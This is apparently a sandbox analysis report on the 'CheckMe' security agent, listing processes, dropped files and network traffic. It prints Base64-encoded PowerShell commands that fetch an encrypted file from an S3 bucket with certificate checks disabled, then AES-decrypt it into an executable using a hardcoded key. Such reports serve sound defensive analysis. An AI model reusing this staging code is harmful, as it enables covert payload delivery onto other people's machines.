dQB0ACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBFAHIAcgBvAHIAOgAgAG8AdQB0AHAAdQB0ACAAZgBpAGwAZQAgAG4AbwB0ACAAYwByAGUAYQB0AGUAZAAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAgACAAIAAgAH0ACgAKACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBSAGUAYQBkAGkAbgBnACAAcgBlAHMAcABvAG4AcwBlACIACgAgACAAIAAgACQAcwB0AGEAdAB1AHMAIAA9ACAAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAAkAHIAZQBxAHUAZQBzAHQAIAAkAG8AdQB0AHAAdQB0AAoAIAAgACAAIAAkAG8AdQB0AHAAdQB0AC4ARgBsAHUAcwBoACgAKQAKACAAIAAgACAAJABvAHUAdABwAHUAdAAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARABvAEcAZQB0ACAAZABvAG4AZQAiAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAcwB0AGEAdAB1AHMACgB9AAoACgAkAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAyAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvAGMAcABjAGgAZQBjAGsAbQBlAGYAaQBsAGUAcwAvAGYAaQBsAGUAcwAvAHcAaQBuADcAXwA2ADQAYgBpAHQAXwBiAGkAZwAuAGUAbgBjACIACgAkAG8AdQB0AEYAaQBsAGUAIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAFoARAAuAGUAeABlACIACgAKAFcAcgBpAHQAZQBMAG8AZwAgACIARABvAHcAbgBsAG8AYQBkACAAcwB0AGEAcgB0AGUAZAAiAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAFsAaQBuAHQAXQAkAHIAZQBzACAAPQAgAEQAbwBHAGUAdAAgACQAdQByAGwAIAAkAG8AdQB0AEYAaQBsAGUACgBXAHIAaQB0AGUATABvAGcAIAAiAEQAbwB3AG4AbABvAGEAZAAgAGUAbgBkACIACgBlAHgAaQB0ACAAJAByAGUAcwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
344 | PowerShell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ACIAKQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACkACgB7AAoACQAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAJACQAYwBzAEUAbgBjAHIAeQBwAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACwAIAAiAFcAcgBpAHQAZQAiAAoACQAKAAkAaQBmACAAKAAhACQAYwBzAEUAbgBjAHIAeQBwAHQAKQAKAAkAewAKAAkACQB0AGgAcgBvAHcAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBOAG8AdABGAG8AdQBuAGQARQB4AGMAZQBwAHQAaQBvAG4AXQAgACIARgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAC4AIgAgAAoACQB9AAoACgAJAHQAcgB5AAoACQB7AAoACQAJACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKAAoACQAJAHcAaABpAGwAZQAgACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAC0AbgBlACAAMAApAAoACQAJAHsACgAJAAkACQAkAGMAcwBFAG4AYwByAHkAcAB0AC4AVwByAGkAdABlACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsACgAJAAkACQAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAJAAkAfQAKAAkAfQAKAAkAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAJAHsACgAJAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAUAByAG8AYwBlAHMAcwBvAHIAKQAKAHsACgAJACQAaQBuAHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAiAE8AcABlAG4AIgAsACAAIgBSAGUAYQBkACIACgAJAGkAZgAgACgAIQAkAGkAbgBwAHUAdAAgAC0AbwByACAAKAAkAGkAbgBwAHUAdAAgAC0AaQBzAG4AbwB0ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AXQApACkACgAJAHsACgAJAAkAdABoAHIAbwB3ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUATgBvAHQARgBvAHUAbgBkAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAiACQASQBuAHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuACIAIAAKAAkAfQAKAAoACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAJAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACAALQBvAHIAIAAoACQAbwB1AHQAcAB1AHQAIAAtAGkAcwBuAG8AdAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AKQApAAoACQB7AAoACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAJAH0ACgAKACAAIAAgACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACAAJABvAHUAdABwAHUAdAAgACQAUAByAG8AYwBlAHMAcwBvAHIACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AJABBAGUAcwApAAoAewAKAAkAJABkAGUAYwByAHkAcAB0AG8AcgAgAD0AIAAkAEEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAIAAkAEkAbgBwAHUAdABGAGkAbABlACAAJABPAHUAdABwAHUAdABGAGkAbABlACAAJABkAGUAYwByAHkAcAB0AG8AcgAgACQAZAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEMAcgBlAGEAdABlAEEAZQBzACgAJABCAGEAcwBlADYANABLAGUAeQBEAGEAdABhACkACgB7AAoACQBbAGIAeQB0AGUAWwBdAF0AJABrAGUAeQBEAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEIAYQBzAGUANgA0AEsAZQB5AEQAYQB0AGEAKQAKAAkAJABtAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACwAJABrAGUAeQBEAGEAdABhACkACgAJACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQgBpAG4AYQByAHkAUgBlAGEAZABlAHIAIAAkAG0AcwAKACAAIAAgACAACgAJACQAYQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoACQAKACAAIAAgACAAJABzAGkAegBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEkAbgB0ADMAMgAoACkAOwAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAHIAZQBhAGQAZQByAC4AUgBlAGEAZABCAHkAdABlAHMAKAAkAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAkAHMAaQB6AGUAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQASQBuAHQAMwAyACgAKQA7AAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAQgB5AHQAZQBzACgAJABzAGkAegBlACkAOwAKAAkACgAJAHIAZQB0AHUAcgBuACAAJABhAGUAcwAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAZQBjAHIAeQBwAHQAVwBpAHQAaABLAGUAeQBkAGEAdABhACgAWwBzAHQAcgBpAG4AZwBdACQARgBpAGwAZQBUAG8ARABlAGMAcgB5AHAAdAAsACAAWwBzAHQAcgBpAG4AZwBdACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAWwBzAHQAcgBpAG4AZwBdACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQApAAoAewAKAAkAJABhAGUAcwAgAD0AIABDAHIAZQBhAHQAZQBBAGUAcwAgACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQAKAAkACQAJAAoACQBEAGUAYwByAHkAcAB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAVABvAEQAZQBjAHIAeQBwAHQAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIAAkAGEAZQBzAAoACQByAGUAdAB1AHIAbgAgADEACgB9AAoAJABpAG4AIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAFoARAAuAGUAeABlACIACgAkAG8AdQB0ACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAEMAUABfAFoARAAuAGUAeABlACIACgAkAGsAZQB5AGQAYQB0AGEAIAA9ACAAIgBFAEEAQQBBAEEARgB1AHgAZwA4ADkAeABIAE0AQgA5AHYAUgBmAHoAWgBxAHYAKwByAFkAYwBnAEEAQQBBAEEAeQA0AGUATgBGADcAWQBLAC8AVwBFAE4AaABNAGwAMwBvAEkASgBZAHYAZwBGAGkAaQBXADMAcABBAFIAQgBuADEAZQAzAHQAWABPAEwAaABRAGgAMAA9ACIACgAKAHIAZQB0AHUAcgBuACAARABlAGMAcgB5AHAAdABXAGkAdABoAEsAZQB5AGQAYQB0AGEAIAAkAGkAbgAgACQAbwB1AHQAIAAkAGsAZQB5AGQAYQB0AGEA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2956 | "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 4294967295 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3088 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2956 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 4294967295 Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ST6UD0KHQ1CQ7TJY3MKU.temp | — | |
MD5:— | SHA256:— | |||
4048 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z355DEP6Y7V01S248ZQU.temp | — | |
MD5:— | SHA256:— | |||
3032 | cpcheckme_Y0p3xqew.exe | C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe | executable | |
MD5:CA86988CB43F077F5C5EAD32C03D64E1 | SHA256:97042B48585B0FA671E5C1A4E8C8D1497727F145486018A65C8EE79CFE932A8B | |||
3420 | cpchmelsagent_Y0p3xqew.exe | C:\temp\CheckMe.log | text | |
MD5:FDA659382F70FA28104E1B9ED3C7115E | SHA256:AC28DE063C5C131C1412339460A2533078B380A0A1C7254B59C675EB56444653 | |||
3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF155780.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3644 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DVHIVTGDVM7V69FTV6O.temp | — | |
MD5:— | SHA256:— | |||
3316 | PowerShell.exe | C:\temp\CP\CmScriptLog.log | text | |
MD5:A1CBB8A8D4C5AD98B4ECD1C1DA8E6EEF | SHA256:5E4C02E746AC39CA1A454DDEAF9AD5543226E7D1A2C73D1D7C8F2DF51B738605 | |||
4048 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF15675e.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3316 | PowerShell.exe | C:\temp\CP\Temp_CP_AM.exe | binary | |
MD5:7208A9F774E92CA5158475B0F3B62140 | SHA256:BDC6FD04D39D6F26B95E05B14123E4E20FA52A502C845364DC0839F80787C2C8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2956 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3644 | PowerShell.exe | GET | 200 | 52.219.88.114:80 | http://s3.us-east-2.amazonaws.com/cpcheckmefiles/files/checkme?commands&Identity=0123456789AB | US | text | 4 b | shared |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
3420 | cpchmelsagent_Y0p3xqew.exe | POST | 200 | 104.27.160.5:80 | http://www.cpcheckme.com/checkme/rest/endpoint/reportTest | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2956 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3316 | PowerShell.exe | 52.219.100.82:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
3420 | cpchmelsagent_Y0p3xqew.exe | 104.27.161.5:80 | www.cpcheckme.com | Cloudflare Inc | US | shared |
3872 | PowerShell.exe | 52.219.88.162:443 | s3.us-east-2.amazonaws.com | Amazon.com, Inc. | US | shared |
3808 | PowerShell.exe | 52.219.104.122:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
3420 | cpchmelsagent_Y0p3xqew.exe | 104.27.160.5:80 | www.cpcheckme.com | Cloudflare Inc | US | shared |
3644 | PowerShell.exe | 52.219.88.114:80 | s3.us-east-2.amazonaws.com | Amazon.com, Inc. | US | shared |
4088 | PowerShell.exe | 52.219.96.194:443 | s3.us-east-2.amazonaws.com | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.cpcheckme.com |
| malicious |
s3.us-east-2.amazonaws.com |
| shared |
www.bing.com |
| whitelisted |
Process | Message |
---|---|
cpchmelsagent_Y0p3xqew.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
cpchmelsagent_Y0p3xqew.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|